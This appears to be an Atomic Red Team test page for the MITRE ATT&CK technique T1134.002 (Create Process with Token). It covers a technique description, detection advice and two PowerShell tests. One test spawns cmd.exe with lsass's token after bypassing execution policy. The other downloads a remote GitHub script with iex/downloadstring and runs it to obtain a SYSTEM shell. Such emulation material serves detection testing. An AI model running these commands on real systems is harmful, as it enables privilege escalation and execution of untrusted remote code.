# T1134.002 - Create Process with Token
Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)

Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).

## Atomic Tests

### Atomic Test #1 - Access Token ManipulationThis Action demonstrates how an access token for a specific program can spawn another program under a different owner. 
Adversaries can leverage access tokens to run programs under a different user not only to achieve privilege escalation but also to evade detection by blending in with normal user activity. 
This Action will query all processes and list the process name and owner.It will then make a copy of an existing token to create a new instance of cmd.exe
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-ExecutionPolicy -Scope Process Bypass -Force
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
$PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
```

In [ ]:
Invoke-AtomicTest T1134.002 -TestNumbers 1

### Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation techniqueGet SYSTEM shell - Pop System Shell using Token Manipulation technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem```

In [ ]:
Invoke-AtomicTest T1134.002 -TestNumbers 2

## Detection
If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the <code>runas</code> command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)

If an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.

Analysts can also monitor for use of Windows APIs such as <code>CreateProcessWithTokenW</code> and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.